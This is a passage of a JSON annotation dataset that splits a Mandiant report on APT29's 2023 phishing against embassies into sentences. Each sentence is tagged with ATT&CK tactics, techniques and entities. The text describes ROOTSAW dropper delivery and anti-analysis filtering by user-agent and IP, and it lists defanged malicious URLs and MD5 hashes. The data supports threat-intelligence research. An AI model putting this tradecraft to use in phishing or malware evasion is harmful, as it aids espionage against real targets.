"entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s1-d8f15f", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "Backchannel Diplomacy: APT29's Rapidly Evolving Diplomatic Phishing Operations | Mandiant | Google Cloud Blog Threat Intelligence Backchannel Diplomacy: APT29’s Rapidly Evolving Diplomatic Phishing Operations September 21, 2023 Written by: Luke Jenkins, Josh Atkins, Dan Black Key Insights APT29’s pace of operations and emphasis on Ukraine increased in the first half of 2023 as Kyiv launched its counteroffensive, pointing to the SVR’s central role in collecting intelligence concerning the current pivotal phase of the war.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s2-b0df9b", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 2, "context_before": "Backchannel Diplomacy: APT29's Rapidly Evolving Diplomatic Phishing Operations | Mandiant | Google Cloud Blog Threat Intelligence Backchannel Diplomacy: APT29’s Rapidly Evolving Diplomatic Phishing Operations September 21, 2023 Written by: Luke Jenkins, Josh Atkins, Dan Black Key Insights APT29’s pace of operations and emphasis on Ukraine increased in the first half of 2023 as Kyiv launched its counteroffensive, pointing to the SVR’s central role in collecting intelligence concerning the current pivotal phase of the war.", "sentence_text": "APT29 has used various infection chains simultaneously across different operations, indicating that distinct initial access operators or subteams are possibly operating in parallel to service different regional targets or espionage objectives.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s3-ddbd50", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 3, "context_before": "APT29 has used various infection chains simultaneously across different operations, indicating that distinct initial access operators or subteams are possibly operating in parallel to service different regional targets or espionage objectives.", "sentence_text": "Threat Detail\nDuring the lead up to Ukraine's counteroffensive, Mandiant and Google’s Threat Analysis Group (TAG) have tracked an increase in the frequency and scope of APT29 phishing operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s4-2cb8fe", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 4, "context_before": "Threat Detail\nDuring the lead up to Ukraine's counteroffensive, Mandiant and Google’s Threat Analysis Group (TAG) have tracked an increase in the frequency and scope of APT29 phishing operations.", "sentence_text": "Investigations into the group’s recent activity have identified an intensification of operations centered on foreign embassies in Ukraine.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s5-10c97b", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 5, "context_before": "Investigations into the group’s recent activity have identified an intensification of operations centered on foreign embassies in Ukraine.", "sentence_text": "Notably, as part of this activity, we have seen phishing emails targeting a wide range of diplomatic representations in Kyiv including those of Moscow’s partners, representing the first time we have observed this cluster of APT29 activity pursuing governments strategically aligned with Russia.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "APT29 conducted phishing campaigns targeting diplomatic entities in Kyiv.", "entities": [ { "text": "APT29", "start": 224, "end": 229, "label": "ThreatActor" }, { "text": "phishing emails targeting a wide range of diplomatic representations", "start": 48, "end": 116, "label": "Action" }, { "text": "phishing emails", "start": 48, "end": 63, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-24_mandiant_report-p1-s6-c2aea0", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 6, "context_before": "Notably, as part of this activity, we have seen phishing emails targeting a wide range of diplomatic representations in Kyiv including those of Moscow’s partners, representing the first time we have observed this cluster of APT29 activity pursuing governments strategically aligned with Russia.", "sentence_text": "Based on the timing and focus of APT29’s Ukraine-focused operations, we judge they are intended to aid Russia’s Foreign Intelligence Service (SVR) in intelligence collection concerning the current pivotal phase of the war.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s7-55a114", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 7, "context_before": "Based on the timing and focus of APT29’s Ukraine-focused operations, we judge they are intended to aid Russia’s Foreign Intelligence Service (SVR) in intelligence collection concerning the current pivotal phase of the war.", "sentence_text": "APT29’s increased phishing activity in Ukraine has occurred alongside an uptick in the group’s more routine espionage operations against global diplomatic entities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s8-413aac", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 8, "context_before": "APT29’s increased phishing activity in Ukraine has occurred alongside an uptick in the group’s more routine espionage operations against global diplomatic entities.", "sentence_text": "We judge that Russia’s war in Ukraine has almost certainly shaped APT29’s espionage priorities, but it has not supplanted them.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s9-33d499", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 9, "context_before": "We judge that Russia’s war in Ukraine has almost certainly shaped APT29’s espionage priorities, but it has not supplanted them.", "sentence_text": "We track this diplomatic-focused phishing activity as operationally distinct from APT29’s ongoing initial access operations targeting cloud-based Microsoft products .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s10-71dbbf", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 10, "context_before": "We track this diplomatic-focused phishing activity as operationally distinct from APT29’s ongoing initial access operations targeting cloud-based Microsoft products .", "sentence_text": "Although APT29’s cloud-focused exploitation may lead to the compromise of diplomatic entities, variance in the scale, quality and targeting patterns of the two lines of effort indicate that they are highly likely distinct initial access clusters operating with different priorities and levels of capability.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s11-f786f9", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 11, "context_before": "Although APT29’s cloud-focused exploitation may lead to the compromise of diplomatic entities, variance in the scale, quality and targeting patterns of the two lines of effort indicate that they are highly likely distinct initial access clusters operating with different priorities and levels of capability.", "sentence_text": "However, we continue to see significant overlap in post-compromise methods across both lines of effort, indicating that multiple initial access teams may hand-off to a centralized exploitation team once inside a victim environment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s12-a4a74d", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 12, "context_before": "However, we continue to see significant overlap in post-compromise methods across both lines of effort, indicating that multiple initial access teams may hand-off to a centralized exploitation team once inside a victim environment.", "sentence_text": "Alongside the increased pace of operations and changes in targeting, we have also seen a major shift in the group’s tooling and tradecraft.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s13-54e2f1", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 13, "context_before": "Alongside the increased pace of operations and changes in targeting, we have also seen a major shift in the group’s tooling and tradecraft.", "sentence_text": "APT29 has rebuilt several of its tools and has made repeated iterative modifications to its existing malware delivery chain, likely to ensure its operational longevity despite long-term persistent use.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s14-5e172c", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 14, "context_before": "APT29 has rebuilt several of its tools and has made repeated iterative modifications to its existing malware delivery chain, likely to ensure its operational longevity despite long-term persistent use.", "sentence_text": "We assess that several of these changes are highly likely specifically designed to sidestep research methods and tools commonly used by the threat intelligence community to track their operations, indicating that operational security priorities continue to factor heavily into APT29’s tooling decisions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s15-776a8d", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 15, "context_before": "We assess that several of these changes are highly likely specifically designed to sidestep research methods and tools commonly used by the threat intelligence community to track their operations, indicating that operational security priorities continue to factor heavily into APT29’s tooling decisions.", "sentence_text": "ROOTSAW’s central and continued role in APT29 operations has spurred changes to the malware delivery chain over time.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s16-306f0c", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 16, "context_before": "ROOTSAW’s central and continued role in APT29 operations has spurred changes to the malware delivery chain over time.", "sentence_text": "The most visible change has been the move away from HTML attachments as the initial infection vector, with APT29 shifting to hosting its first-stage payloads on compromised web services such as WordPress sites.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Host payloads on compromised web services.", "entities": [ { "text": "APT29", "start": 107, "end": 112, "label": "ThreatActor" }, { "text": "hosting its first-stage payloads on compromised web services", "start": 125, "end": 185, "label": "Action" }, { "text": "WordPress sites", "start": 194, "end": 209, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-24_mandiant_report-p1-s17-127b0d", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 17, "context_before": "The most visible change has been the move away from HTML attachments as the initial infection vector, with APT29 shifting to hosting its first-stage payloads on compromised web services such as WordPress sites.", "sentence_text": "Migrating the first-stage payload server side has likely provided APT29 a greater degree of control over its malware delivery chain and allowed the group to be more judicious about the exposure of its later-stage capabilities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s18-555f62", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 18, "context_before": "Migrating the first-stage payload server side has likely provided APT29 a greater degree of control over its malware delivery chain and allowed the group to be more judicious about the exposure of its later-stage capabilities.", "sentence_text": "For example, to prevent detection of malware in environments not intended for compromise, APT29 has implemented various forms of filtering in its first-stage payloads and has removed staged malware from compromised servers shortly after operational use.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": null, "procedure": "APT29 implements filtering in first-stage payloads and removes staged malware from compromised servers after use to reduce detection.", "entities": [ { "text": "APT29", "start": 90, "end": 95, "label": "ThreatActor" }, { "text": "has implemented various forms of filtering", "start": 96, "end": 138, "label": "Action" }, { "text": "has removed staged malware", "start": 171, "end": 197, "label": "Action" } ] }, { "uid": "mandiant-24_mandiant_report-p1-s19-69ec13", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 19, "context_before": "For example, to prevent detection of malware in environments not intended for compromise, APT29 has implemented various forms of filtering in its first-stage payloads and has removed staged malware from compromised servers shortly after operational use.", "sentence_text": "In this accelerated period of tooling evolution, the group has also begun to rotate in novel malware delivery tools and techniques instead of its mainstay first-stage payload.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s21-4fce4c", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 21, "context_before": "March 2023:", "sentence_text": "Earthquake-Themed Türkiye Campaign In March 2023, Mandiant identified a new APT29 phishing campaign targeting Türkiye.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s22-c1b966", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 22, "context_before": "Earthquake-Themed Türkiye Campaign In March 2023, Mandiant identified a new APT29 phishing campaign targeting Türkiye.", "sentence_text": "The phishing waves impersonated the Turkish Deputy Minister of Foreign Affairs and included a phishing link accompanied by content related to the February 2023 earthquake that struck southern Türkiye.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Conduct phishing campaign by impersonating a government official and delivering a phishing link themed around a real-world event.", "entities": [ { "text": "phishing waves", "start": 4, "end": 18, "label": "ThreatActor" }, { "text": "impersonated the Turkish Deputy Minister of Foreign Affairs", "start": 19, "end": 78, "label": "Action" }, { "text": "included a phishing link accompanied by content related to the February 2023 earthquake that struck southern Türkiye", "start": 83, "end": 199, "label": "Action" } ] }, { "uid": "mandiant-24_mandiant_report-p1-s23-506fc9", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 23, "context_before": "The phishing waves impersonated the Turkish Deputy Minister of Foreign Affairs and included a phishing link accompanied by content related to the February 2023 earthquake that struck southern Türkiye.", "sentence_text": "The first wave, conducted in early March, used a phishing link generated by a URL shortening service “https://tinyurl[.]com/mrxcjsbs” to redirect victims to a ROOTSAW dropper hosted on an actor-controlled compromised website “https://www.willyminiatures[.]com/e-yazi.htm/?v=bc78a8d162c6”.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Use a phishing link generated via a URL shortener to redirect victims to a ROOTSAW dropper hosted on an actor-controlled compromised website.", "entities": [ { "text": "used a phishing link", "start": 42, "end": 62, "label": "Action" }, { "text": "redirect victims to a ROOTSAW dropper", "start": 137, "end": 174, "label": "Action" }, { "text": "https://tinyurl[.]com/mrxcjsbs", "start": 102, "end": 132, "label": "Infrastructure_Indicator" }, { "text": "ROOTSAW dropper", "start": 159, "end": 174, "label": "MalwareTool" }, { "text": "https://www.willyminiatures[.]com/e-yazi.htm/?v=bc78a8d162c6", "start": 226, "end": 286, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-24_mandiant_report-p1-s24-752337", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 24, "context_before": "The first wave, conducted in early March, used a phishing link generated by a URL shortening service “https://tinyurl[.]com/mrxcjsbs” to redirect victims to a ROOTSAW dropper hosted on an actor-controlled compromised website “https://www.willyminiatures[.]com/e-yazi.htm/?v=bc78a8d162c6”.", "sentence_text": "When visited, the URL downloaded the ROOTSAW dropper \"e-yazi.htm\" (MD5: a3067a0262e651e94329869f43a51722) to drop additional files onto the victim machine, including a malicious ISO, \"e-yazi.iso\" (MD5: eeded26943a7b2fdef7608fb21bbfd66).", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1189", "name": "Drive-by Compromise" } ], "procedure": "Visiting the URL downloads the ROOTSAW dropper and delivers additional files including a malicious ISO to the victim machine.", "entities": [ { "text": "downloaded the ROOTSAW dropper \"e-yazi.htm\"", "start": 22, "end": 65, "label": "Action" }, { "text": "drop additional files onto the victim machine", "start": 109, "end": 154, "label": "Action" }, { "text": "ROOTSAW dropper", "start": 37, "end": 52, "label": "MalwareTool" }, { "text": "e-yazi.htm", "start": 54, "end": 64, "label": "Infrastructure_Indicator" }, { "text": "e-yazi.iso", "start": 184, "end": 194, "label": "MalwareTool" } ] }, { "uid": "mandiant-24_mandiant_report-p1-s25-0f6533", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 25, "context_before": "When visited, the URL downloaded the ROOTSAW dropper \"e-yazi.htm\" (MD5: a3067a0262e651e94329869f43a51722) to drop additional files onto the victim machine, including a malicious ISO, \"e-yazi.iso\" (MD5: eeded26943a7b2fdef7608fb21bbfd66).", "sentence_text": "This is the first time Mandiant has seen APT29 introduce an additional layer of obfuscation to its phishing links using a URL shortening service.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s26-860c49", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 26, "context_before": "This is the first time Mandiant has seen APT29 introduce an additional layer of obfuscation to its phishing links using a URL shortening service.", "sentence_text": "The second wave, victims were directed to an actor-controlled compromised website “https://simplesalsamix[.]com/e-yazi.html” to download the ROOTSAW dropper \"e-yazi.html\" (MD5: b051e8efb40c2c435d77f3be77c59488).", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1189", "name": "Drive-by Compromise" } ], "procedure": "Direct victims to a compromised website to download the ROOTSAW dropper.", "entities": [ { "text": "victims were directed to an actor-controlled compromised website", "start": 17, "end": 81, "label": "Action" }, { "text": "https://simplesalsamix[.]com/e-yazi.html", "start": 83, "end": 123, "label": "Infrastructure_Indicator" }, { "text": "download the ROOTSAW dropper \"e-yazi.html\"", "start": 128, "end": 170, "label": "Action" }, { "text": "ROOTSAW dropper", "start": 141, "end": 156, "label": "MalwareTool" }, { "text": "e-yazi.html", "start": 158, "end": 169, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-24_mandiant_report-p1-s27-d7968e", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 27, "context_before": "The second wave, victims were directed to an actor-controlled compromised website “https://simplesalsamix[.]com/e-yazi.html” to download the ROOTSAW dropper \"e-yazi.html\" (MD5: b051e8efb40c2c435d77f3be77c59488).", "sentence_text": "The second ROOTSAW sample dropped similar decoy content and a malicious ZIP file, e-yazi.zip (MD5: 854e5c592e93b69b8ab08dbc8a0b673f), that contained second-stage downloaders and an additional ROOTSAW dropper file.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Dropped a malicious ZIP file containing second-stage downloaders and an additional ROOTSAW dropper.", "entities": [ { "text": " ROOTSAW", "start": 10, "end": 18, "label": "MalwareTool" }, { "text": "e-yazi.zip", "start": 82, "end": 92, "label": "Infrastructure_Indicator" }, { "text": "dropped similar decoy content and a malicious ZIP file", "start": 26, "end": 80, "label": "Action" } ] }, { "uid": "mandiant-24_mandiant_report-p1-s28-9cf40e", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 28, "context_before": "The second ROOTSAW sample dropped similar decoy content and a malicious ZIP file, e-yazi.zip (MD5: 854e5c592e93b69b8ab08dbc8a0b673f), that contained second-stage downloaders and an additional ROOTSAW dropper file.", "sentence_text": "In both waves, APT29 incorporated a new version of ROOTSAW with added user-agent based anti-analysis guardrails.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s29-e68a5e", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 29, "context_before": "In both waves, APT29 incorporated a new version of ROOTSAW with added user-agent based anti-analysis guardrails.", "sentence_text": "This variant checks the user-agent of the device, looking for Windows operating systems that do not contain “.NET” and contain the value “Windows NT”.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1497", "name": "Virtualization/Sandbox Evasion" } ], "procedure": "Check the device user-agent to identify Windows systems based on specific string conditions.", "entities": [ { "text": "checks the user-agent of the device", "start": 13, "end": 48, "label": "Action" }, { "text": "Windows operating systems", "start": 62, "end": 87, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-24_mandiant_report-p1-s30-12ad62", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 30, "context_before": "This variant checks the user-agent of the device, looking for Windows operating systems that do not contain “.NET” and contain the value “Windows NT”.", "sentence_text": "In the second wave, this PDF file was identical to the version contained in the malicious ZIP payload.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s31-41eb54", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 31, "context_before": "In the second wave, this PDF file was identical to the version contained in the malicious ZIP payload.", "sentence_text": "This filtering tactic is likely used to identify automated downloaders and non-compatible victim devices, further reducing the odds of exposing malware in non-compromise contexts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s32-8193df", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 32, "context_before": "This filtering tactic is likely used to identify automated downloaders and non-compatible victim devices, further reducing the odds of exposing malware in non-compromise contexts.", "sentence_text": "Each payload within the new ROOTSAW variant is obfuscated using a unique key, although the deobfuscation routine remains the same.\nMarch 2023:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s33-b8f6a3", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 33, "context_before": "Each payload within the new ROOTSAW variant is obfuscated using a unique key, although the deobfuscation routine remains the same.\nMarch 2023:", "sentence_text": "European Diplomatic-Focused Phishing Campaigns In an additional phishing campaign in March 2023, APT29 targeted various diplomatic missions in Europe.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s34-31f3a8", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 34, "context_before": "European Diplomatic-Focused Phishing Campaigns In an additional phishing campaign in March 2023, APT29 targeted various diplomatic missions in Europe.", "sentence_text": "In the first wave, emails contained a PDF attachment (MD5: 1485b591e654327c1d032a901940b149) inviting victims to a drink reception following an event on the “Future of International Economic Relations” from the Embassy of Spain.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "emails contained a PDF attachment inviting victims to a drink reception", "entities": [ { "text": "PDF attachment", "start": 38, "end": 52, "label": "MalwareTool" }, { "text": "1485b591e654327c1d032a901940b149", "start": 59, "end": 91, "label": "Infrastructure_Indicator" }, { "text": "contained a PDF attachment (MD5: 1485b591e654327c1d032a901940b149) inviting victims to a drink reception", "start": 26, "end": 130, "label": "Action" } ] }, { "uid": "mandiant-24_mandiant_report-p1-s35-a0e74d", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 35, "context_before": "In the first wave, emails contained a PDF attachment (MD5: 1485b591e654327c1d032a901940b149) inviting victims to a drink reception following an event on the “Future of International Economic Relations” from the Embassy of Spain.", "sentence_text": "The PDF contains a link to an actor-hosted ROOTSAW variant hosted at “https://parquesanrafael[.]cl/note.html”, ultimately leading to the deployment of MUSKYBEAT (also known publicly as QUARTERRIG ).", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.002", "name": "Phishing: Link" } ], "procedure": "Deliver malware via phishing link to ROOTSAW payload.", "entities": [ { "text": "ROOTSAW", "start": 43, "end": 50, "label": "MalwareTool" }, { "text": "MUSKYBEAT", "start": 151, "end": 160, "label": "MalwareTool" }, { "text": "contains a link to an actor-hosted ROOTSAW variant", "start": 8, "end": 58, "label": "Action" }, { "text": "https://parquesanrafael[.]cl/note.html", "start": 70, "end": 108, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-24_mandiant_report-p1-s36-cc4cf6", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 36, "context_before": "The PDF contains a link to an actor-hosted ROOTSAW variant hosted at “https://parquesanrafael[.]cl/note.html”, ultimately leading to the deployment of MUSKYBEAT (also known publicly as QUARTERRIG ).", "sentence_text": "This version of ROOTSAW sends the victim’s user-agent to the compromised server using an HTTP GET request “https://parquesanrafael[.]cl/note.php?ua=”.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Send user-agent data to server via HTTP request.", "entities": [ { "text": "ROOTSAW", "start": 16, "end": 23, "label": "MalwareTool" }, { "text": "sends the victim’s user-agent to the compromised server", "start": 24, "end": 79, "label": "Action" }, { "text": "https://parquesanrafael[.]cl/note.php?ua=", "start": 107, "end": 148, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-24_mandiant_report-p1-s37-94b9a1", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 37, "context_before": "This version of ROOTSAW sends the victim’s user-agent to the compromised server using an HTTP GET request “https://parquesanrafael[.]cl/note.php?ua=”.", "sentence_text": "The server then performs filtering based on an actor-defined denylist, finally returning a decryption key for the payload if the tests are successfully passed.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated/Encrypted File" } ], "procedure": "Filter victims and return decryption key for payload.", "entities": [ { "text": "performs filtering based on an actor-defined denylist", "start": 16, "end": 69, "label": "Action" }, { "text": "returning a decryption key for the payload", "start": 79, "end": 121, "label": "Action" } ] }, { "uid": "mandiant-24_mandiant_report-p1-s38-9f9e57", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 38, "context_before": "The server then performs filtering based on an actor-defined denylist, finally returning a decryption key for the payload if the tests are successfully passed.", "sentence_text": "In the second wave, APT29 delivered an additional new variant of ROOTSAW (MD5: 0d5b12c50173a176b0a8ba5a97a831d8), containing both user-agent and IP filtering, but ultimately leading to the same MUSKYBEAT downloader.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": null, "procedure": "Deliver a new ROOTSAW variant that leads to the MUSKYBEAT downloader.", "entities": [ { "text": "APT29", "start": 20, "end": 25, "label": "ThreatActor" }, { "text": "delivered an additional new variant of ROOTSAW", "start": 26, "end": 72, "label": "Action" }, { "text": "ROOTSAW", "start": 65, "end": 72, "label": "MalwareTool" }, { "text": "MUSKYBEAT downloader", "start": 194, "end": 214, "label": "MalwareTool" } ] }, { "uid": "mandiant-24_mandiant_report-p1-s39-d3726a", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 39, "context_before": "In the second wave, APT29 delivered an additional new variant of ROOTSAW (MD5: 0d5b12c50173a176b0a8ba5a97a831d8), containing both user-agent and IP filtering, but ultimately leading to the same MUSKYBEAT downloader.", "sentence_text": "This version conducts an additional check by obtaining the victim’s IP address through a request to a public API service “https://api.ipify[.]org/?format=json”.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1016", "name": "System Network Configuration Discovery" } ], "procedure": "Obtain victim IP address via API request.", "entities": [ { "text": "obtaining the victim’s IP address through a request", "start": 45, "end": 96, "label": "Action" }, { "text": "https://api.ipify[.]org/?format=json", "start": 122, "end": 158, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-24_mandiant_report-p1-s41-187abc", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 41, "context_before": "April 2023:", "sentence_text": "The document contained a link to the phishing website “https://sylvio[.]com[.]br/form.php”, which delivered either an ISO or a ZIP archive to the victim.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.002", "name": "Phishing: Spearphishing Link" } ], "procedure": "Use a document containing a link to a phishing website that delivers an ISO or ZIP archive to the victim.", "entities": [ { "text": "contained a link to the phishing website", "start": 13, "end": 53, "label": "Action" }, { "text": "https://sylvio[.]com[.]br/form.php", "start": 55, "end": 89, "label": "Infrastructure_Indicator" }, { "text": "delivered either an ISO or a ZIP archive to the victim", "start": 98, "end": 152, "label": "Action" } ] }, { "uid": "mandiant-24_mandiant_report-p1-s42-a72e87", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 42, "context_before": "The document contained a link to the phishing website “https://sylvio[.]com[.]br/form.php”, which delivered either an ISO or a ZIP archive to the victim.", "sentence_text": "Rather than using ROOTSAW, victims were delivered a malicious ISO or ZIP file directly from the compromised web server if they successfully passed the server-side filtering checks.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.002", "name": "Phishing: Spearphishing Link" } ], "procedure": "Deliver a malicious ISO or ZIP file from a compromised web server after victims pass server-side filtering checks.", "entities": [ { "text": "ROOTSAW", "start": 18, "end": 25, "label": "MalwareTool" }, { "text": "were delivered a malicious ISO or ZIP file", "start": 35, "end": 77, "label": "Action" }, { "text": "compromised web server", "start": 96, "end": 118, "label": "Infrastructure_Indicator" }, { "text": "passed the server-side filtering checks", "start": 140, "end": 179, "label": "Action" } ] }, { "uid": "mandiant-24_mandiant_report-p1-s43-1491b5", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 43, "context_before": "Rather than using ROOTSAW, victims were delivered a malicious ISO or ZIP file directly from the compromised web server if they successfully passed the server-side filtering checks.", "sentence_text": "The decision to remove the HTML smuggling stage of the infection chain was likely intended to further reduce the number of forensic artifacts left on the host that are prone to detection or later analysis.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s44-0c72f7", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 44, "context_before": "The decision to remove the HTML smuggling stage of the infection chain was likely intended to further reduce the number of forensic artifacts left on the host that are prone to detection or later analysis.", "sentence_text": "May 2023: Ukraine Foreign Embassy-Focused Campaigns In May, in the lead up to Ukraine’s counteroffensive, APT29 conducted two distinct phishing waves targeting a wide range of diplomatic representations in Kyiv, including those of Moscow’s partners.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Conduct two phishing waves targeting diplomatic representations in Kyiv.", "entities": [ { "text": "APT29", "start": 106, "end": 111, "label": "ThreatActor" }, { "text": "conducted two distinct phishing waves", "start": 112, "end": 149, "label": "Action" }, { "text": "targeting a wide range of diplomatic representations in Kyiv", "start": 150, "end": 210, "label": "Action" } 